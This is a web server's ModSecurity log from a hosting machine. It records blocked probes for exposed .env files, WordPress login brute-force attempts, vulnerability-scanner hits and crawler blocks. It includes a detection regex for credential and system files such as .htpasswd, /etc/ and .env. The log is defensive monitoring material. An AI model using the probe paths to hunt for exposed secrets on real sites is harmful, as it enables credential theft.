[Tue May 26 14:46:18.475387 2026] [security2:error] [pid 636820:tid 636970] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk4q_r6oOphPch7B-eZwAAABQ"]
[Tue May 26 14:46:18.545511 2026] [http2:info] [pid 648203:tid 648203] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:46:19.291227 2026] [security2:error] [pid 648203:tid 648423] [client 20.12.190.196:55269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/sx_pms.php"] [unique_id "ahVk47EQDDtxJNiDrdTHugAAAN8"]
[Tue May 26 14:46:19.291365 2026] [security2:error] [pid 648203:tid 648423] [client 20.12.190.196:55269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/sx_pms.php"] [unique_id "ahVk47EQDDtxJNiDrdTHugAAAN8"]
[Tue May 26 14:46:19.678745 2026] [security2:error] [pid 648203:tid 648400] [client 65.111.1.183:52555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 183.1.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk47EQDDtxJNiDrdTHwQAAAMg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:20.511711 2026] [security2:error] [pid 648203:tid 648209] [remote 45.148.10.95:54676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.kingsclubmembership.com"] [uri "/.docker/.env"] [unique_id "ahVk5LEQDDtxJNiDrdTH3wAAqQU"]
[Tue May 26 14:46:20.524888 2026] [security2:error] [pid 648203:tid 648208] [remote 209.42.20.53:59588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH3gAAmQQ"]
[Tue May 26 14:46:20.767127 2026] [security2:error] [pid 648203:tid 648207] [remote 45.148.10.95:54676] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahVk47EQDDtxJNiDrdTH1AAAqQM"]
[Tue May 26 14:46:20.831954 2026] [security2:error] [pid 648203:tid 648214] [remote 45.148.10.95:54676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.kingsclubmembership.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVk5LEQDDtxJNiDrdTH8AAAhQo"]
[Tue May 26 14:46:20.896918 2026] [security2:error] [pid 648203:tid 648322] [remote 45.148.10.95:54598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.kingsclubbanquet.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVk5LEQDDtxJNiDrdTH9QAAxXY"]
[Tue May 26 14:46:20.997121 2026] [security2:error] [pid 648203:tid 648398] [client 20.12.190.196:55261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-info.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH-wAAAMY"]
[Tue May 26 14:46:20.997318 2026] [security2:error] [pid 648203:tid 648398] [client 20.12.190.196:55261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-info.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH-wAAAMY"]
[Tue May 26 14:46:21.048887 2026] [security2:error] [pid 648203:tid 648352] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH4wAAAJg"]
[Tue May 26 14:46:21.074931 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:54676] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH5AAAhQc"]
[Tue May 26 14:46:21.085462 2026] [security2:error] [pid 648203:tid 648382] [client 195.178.110.34:37254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/js/.env"] [unique_id "ahVk5bEQDDtxJNiDrdTIAAAAALY"]
[Tue May 26 14:46:21.259495 2026] [security2:error] [pid 648203:tid 648364] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH7gAAAKQ"]
[Tue May 26 14:46:21.479382 2026] [security2:error] [pid 648203:tid 648324] [remote 5.42.158.148:56196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVk5bEQDDtxJNiDrdTIBgAA0Hg"]
[Tue May 26 14:46:21.746520 2026] [security2:error] [pid 648203:tid 648319] [remote 45.148.10.95:54676] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH8gAAhXM"]
[Tue May 26 14:46:21.779545 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:54676] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH8QAAhQs"]
[Tue May 26 14:46:21.852579 2026] [security2:error] [pid 648203:tid 648379] [client 209.50.176.8:47181] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH5QAAALM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:21.993326 2026] [security2:error] [pid 648203:tid 648384] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahVk5LEQDDtxJNiDrdTH9wAAALg"]
[Tue May 26 14:46:22.721466 2026] [security2:error] [pid 648203:tid 648357] [client 74.249.173.207:38979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.newnigeria.thedebateafrica.org"] [uri "/wk/index.php"] [unique_id "ahVk5rEQDDtxJNiDrdTIMgAAAJ0"]
[Tue May 26 14:46:23.025802 2026] [security2:error] [pid 648203:tid 648353] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk5rEQDDtxJNiDrdTILgAAAJk"]
[Tue May 26 14:46:23.391694 2026] [security2:error] [pid 648203:tid 648331] [remote 84.247.181.196:53946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVk57EQDDtxJNiDrdTIPwAAwH8"]
[Tue May 26 14:46:24.033847 2026] [security2:error] [pid 648203:tid 648428] [client 74.249.173.207:38980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.newnigeria.thedebateafrica.org"] [uri "/inputs.php"] [unique_id "ahVk6LEQDDtxJNiDrdTIaQAAAOQ"]
[Tue May 26 14:46:24.086550 2026] [security2:error] [pid 648203:tid 648374] [client 209.50.172.149:52863] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk5rEQDDtxJNiDrdTIMwAAAK4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:24.578339 2026] [autoindex:error] [pid 648203:tid 648443] [client 82.25.213.124:0] AH01276: Cannot serve directory /home2/glorolle/public_html/proxuber.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:46:24.703991 2026] [security2:error] [pid 648203:tid 648431] [client 20.12.190.196:54848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-test.php"] [unique_id "ahVk6LEQDDtxJNiDrdTIfAAAAOc"]
[Tue May 26 14:46:24.704104 2026] [security2:error] [pid 648203:tid 648431] [client 20.12.190.196:54848] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-test.php"] [unique_id "ahVk6LEQDDtxJNiDrdTIfAAAAOc"]
[Tue May 26 14:46:25.220604 2026] [security2:error] [pid 648203:tid 648446] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk6LEQDDtxJNiDrdTIfwAAAPY"]
[Tue May 26 14:46:25.632480 2026] [security2:error] [pid 648203:tid 648399] [client 65.111.22.11:19891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.22.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk6bEQDDtxJNiDrdTIkgAAAMc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:26.082829 2026] [autoindex:error] [pid 648203:tid 648333] [client 161.123.65.162:0] AH01276: Cannot serve directory /home2/glorolle/public_html/proxuber.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:46:26.427316 2026] [security2:error] [pid 648203:tid 648445] [client 20.12.190.196:55271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/asd67.php"] [unique_id "ahVk6rEQDDtxJNiDrdTIpAAAAPU"]
[Tue May 26 14:46:26.427409 2026] [security2:error] [pid 648203:tid 648445] [client 20.12.190.196:55271] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/asd67.php"] [unique_id "ahVk6rEQDDtxJNiDrdTIpAAAAPU"]
[Tue May 26 14:46:26.889271 2026] [security2:error] [pid 648203:tid 648342] [client 146.174.168.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk6rEQDDtxJNiDrdTIpwAAAI4"]
[Tue May 26 14:46:27.249214 2026] [autoindex:error] [pid 648203:tid 648446] [client 206.232.103.131:0] AH01276: Cannot serve directory /home2/glorolle/public_html/proxuber.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:46:27.613463 2026] [security2:error] [pid 648203:tid 648388] [client 195.178.110.34:47278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/laravel/.env"] [unique_id "ahVk67EQDDtxJNiDrdTI2QAAALw"]
[Tue May 26 14:46:27.912448 2026] [security2:error] [pid 648203:tid 648379] [client 209.50.187.200:59649] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk6rEQDDtxJNiDrdTIsgAAALM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:27.975309 2026] [security2:error] [pid 648203:tid 648399] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk67EQDDtxJNiDrdTI1QAAAMc"]
[Tue May 26 14:46:28.794125 2026] [security2:error] [pid 648203:tid 648337] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/laravel/core/.env"] [unique_id "ahVk7LEQDDtxJNiDrdTJBgAAAIk"]
[Tue May 26 14:46:29.091490 2026] [security2:error] [pid 648203:tid 648440] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/mail/.env"] [unique_id "ahVk7bEQDDtxJNiDrdTJDQAAAPA"]
[Tue May 26 14:46:29.417465 2026] [security2:error] [pid 648203:tid 648393] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/mailer/.env"] [unique_id "ahVk7bEQDDtxJNiDrdTJHwAAAME"]
[Tue May 26 14:46:29.740517 2026] [security2:error] [pid 648203:tid 648449] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/nginx/.env"] [unique_id "ahVk7bEQDDtxJNiDrdTJJAAAAPk"]
[Tue May 26 14:46:30.092755 2026] [security2:error] [pid 648203:tid 648390] [client 114.119.156.126:47465] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/chocolate-turkish-coffee"] [unique_id "ahVk7rEQDDtxJNiDrdTJOAAAAL4"], referer: http://haddingtonwines.com/products/chocolate-turkish-coffee
[Tue May 26 14:46:30.093632 2026] [security2:error] [pid 648203:tid 648453] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/public/.env"] [unique_id "ahVk7rEQDDtxJNiDrdTJNwAAAP0"]
[Tue May 26 14:46:30.155483 2026] [security2:error] [pid 648203:tid 648346] [client 209.50.175.58:45207] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk7LEQDDtxJNiDrdTJCgAAAJI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:30.189817 2026] [security2:error] [pid 648203:tid 648460] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk7bEQDDtxJNiDrdTJKQAAAQQ"]
[Tue May 26 14:46:30.416779 2026] [security2:error] [pid 648203:tid 648459] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/site/.env"] [unique_id "ahVk7rEQDDtxJNiDrdTJRgAAAQM"]
[Tue May 26 14:46:30.919556 2026] [security2:error] [pid 648203:tid 648357] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/xampp/.env"] [unique_id "ahVk7rEQDDtxJNiDrdTJVQAAAJ0"]
[Tue May 26 14:46:31.086841 2026] [security2:error] [pid 648203:tid 648398] [client 213.35.106.232:59755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.osmsi.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVk7rEQDDtxJNiDrdTJUwAAAMY"]
[Tue May 26 14:46:31.768041 2026] [security2:error] [pid 648203:tid 648348] [client 195.178.110.34:47288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/main/.env"] [unique_id "ahVk77EQDDtxJNiDrdTJcAAAAJQ"]
[Tue May 26 14:46:31.923555 2026] [security2:error] [pid 648203:tid 648406] [client 172.226.44.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVk7rEQDDtxJNiDrdTJPwAAAM4"]
[Tue May 26 14:46:32.272145 2026] [security2:error] [pid 648203:tid 648334] [client 65.111.10.12:20147] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk77EQDDtxJNiDrdTJXwAAAIY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:32.449054 2026] [security2:error] [pid 648203:tid 648375] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk77EQDDtxJNiDrdTJewAAAK8"]
